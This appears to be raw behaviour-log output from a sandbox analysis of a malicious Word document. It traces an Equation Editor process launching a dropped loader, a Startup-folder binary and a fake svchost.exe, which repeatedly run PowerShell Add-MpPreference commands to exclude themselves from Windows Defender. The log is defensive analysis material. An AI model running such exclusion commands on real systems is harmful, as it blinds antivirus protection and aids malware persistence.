Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............p...............5.......................0.......................l.........&.............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............p...............W.......................0...............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.............p.......................................0.................................&.............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............p.......................................0.................................&.............

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: PO5421-allignright.doc

ReversingLabs: Detection: 19%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe'
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe'
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: unknown	Process created: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe'
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe'
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Process created: C:\Users\user\AppData\Roaming\CTF loader_es.exe C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: PO5421-allignright.doc

Static file information: File size 1259855 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2112108084.00000000029D6000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2110370004.0000000000916000.00000004.00000040.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2126177757.00000000062CD000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.2110370004.0000000000916000.00000004.00000040.sdmp
Source:	Binary string: ??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.260.7193798tion.pdby.resources.exes.exeI.ni.dll source: powershell.exe, 00000007.00000002.2109706042.00000000006AB000.00000004.00000020.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdbV source: powershell.exe, 00000005.00000002.2112108084.00000000029D6000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2110370004.0000000000916000.00000004.00000040.sdmp
